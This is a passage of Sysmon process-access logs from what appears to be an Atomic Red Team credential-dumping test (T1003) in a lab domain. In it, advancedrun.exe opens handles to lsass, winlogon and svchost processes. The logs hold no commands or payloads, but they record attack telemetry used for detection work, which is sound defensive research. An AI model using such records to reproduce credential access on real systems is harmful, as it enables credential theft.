10341000x80000000000000003943782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943774Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003943773Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943772Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943771Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943770Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943768Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943766Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.121{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advanced